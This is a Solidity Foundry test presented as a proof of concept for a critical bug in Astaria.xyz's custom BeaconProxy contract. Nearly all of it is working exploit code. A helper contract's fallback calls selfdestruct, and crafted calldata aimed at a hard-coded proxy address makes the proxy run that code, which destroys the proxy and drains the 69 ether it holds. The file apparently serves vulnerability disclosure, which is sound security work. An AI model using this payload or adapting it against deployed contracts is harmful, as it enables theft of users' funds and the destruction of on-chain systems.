PoC of crit bug found in Astaria.xyz's custom BeaconProxy contract

cursedbeaconproxy.sol

// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.13;

import "forge-std/Test.sol";

contract SheHateMe {
    receive() external payable {}

    function getImpl(uint8 x) public returns (address) {
        return address(this);
    }

    fallback() external {
        selfdestruct(payable(msg.sender));
    }
}


contract HackAstaria is Test {
    SheHateMe public sheHateMe;
    address public proxy = payable(address(0x1bee35414De2691454bd7090DB64ececFB65581f));

    function setUp() public {
        sheHateMe = new SheHateMe();
        vm.deal(proxy, 69 ether);
    }

    function testHackinItInSanDiego() public {
        assertEq(proxy.balance, 69 ether);  // proxy has 69 ether

        // the secret sauce
        bytes memory data = abi.encodePacked(bytes4(uint32(0x1badbabe)),uint(uint160(address(sheHateMe))), uint8(0x69), uint16(0x0015));
        
        (bool success, bytes memory ret) = proxy.call(data);        
        assertEq(success, true);
        assertEq(proxy.balance, 0); // proxy has no ether (because it selfdestructed)
        console.log("hack successful");
    }
}

context